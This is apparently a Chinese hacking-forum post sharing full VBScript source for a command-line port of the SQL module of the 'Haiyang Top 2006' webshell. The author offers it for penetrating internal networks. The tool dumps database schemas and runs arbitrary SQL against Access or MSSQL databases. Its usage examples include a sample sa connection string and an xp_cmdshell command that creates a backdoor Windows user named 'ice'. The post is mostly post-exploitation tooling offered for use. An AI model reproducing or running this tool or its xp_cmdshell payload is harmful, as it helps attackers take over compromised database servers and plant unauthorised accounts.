花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了,和它的功能是一模一样的,不过用起来可能没有asp版的舒服,不过能用,可以用在dos下了,渗透内网时估计你用得着。
if (lcase(right(wscript.fullname,11))="wscript.exe") then
echo "Execute it under the cmd.exe Plz! Thx."
echo "code by lcx"
wscript.quit
end If
if wscript.arguments.count<1 then
echo "Usage: cscript sql.vbs showTables e:/hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"
echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
end If
Sub chkErr(Err)
If Err Then
echo "错误: " & Err.Description & "错误源: " & Err.Source & vbcrlf
Err.Clear
wscript.quit
End If
End Sub
Sub echo(str)
wscript.echo str
End Sub
Function fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function
Sub showErr(str)
Dim i, arrayStr
arrayStr = Split(str, "$$")
echo "出错信息:"&vbcrlf
For i = 0 To UBound(arrayStr)
echo (i + 1) & ". " & arrayStr(i) & "<br/>"
Next
echo vbcrlf
wscript.quit
End Sub
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 下面是程序模块选择部分
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PageMsDataBase()
Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Wscript.Arguments(0)
sqlStr = Wscript.Arguments(1)
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
End Select
End Sub
Sub showTables()
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Wscript.Arguments(1)
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo tablesStr & "================================================="
Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo rsTable("Table_Name") &vbcrlf
Do Until rsColumn.Eof
echo "字段名:" & rsColumn("Column_Name")&vbclrf
echo "类型:" & getDataType(rsColumn("Data_Type")) & vbclrf
echo "大小:" & rsColumn("Character_Maximum_Length") & vbclrf
echo "精度:" & rsColumn("Numeric_Precision") & vbclrf
echo "允许为空:" & rsColumn("Is_Nullable") & vbclrf
echo "默认值:" & rsColumn("Column_Default") & vbclrf&vbclrf
rsColumn.MoveNext
Loop
rsTable.MoveNext
echo vbcrlf
Loop
echo "==============================================================="
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sqlStr = Wscript.Arguments(1)
theTable = Wscript.Arguments(2)
sql=Wscript.Arguments(3)
page=Wscript.Arguments(4)
If Not IsNumeric(page) or page = "" Then
page = 1
End If
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = CreateObject("Adodb.RecordSet")
Set conn = CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "数据库表结构查看:"
echo tablesStr & "========================================================"
echo ">SQL命令执行及查看<:"&vbcrlf
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "SQL操作 - 执行结果"&vbcrlf
echo "===================="&theTable&"列名如下========================================"
For j = 0 To rs.Fields.Count-1
echo rs.Fields(j).Name & vbcrlf
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If
For j = 0 To rs.Fields.Count-1
echo fixNull(rs(j))& vbcrlf
Next
rs.MoveNext
Next
End If
echo "================================================================="
echo " 共有"&rs.Fields.Count&"列" & vbcrlf
For i = 1 To rs.PageCount
page=i
Next
echo " 共有" & page & "页"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "执行完毕!"&vbcrlf
End If
End If
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function
Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
echo "存在以下表名:"
Do Until rsTable.Eof
getTableList = getTableList & "["& rsTable("Table_Name") & "]"&vbcrlf
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function
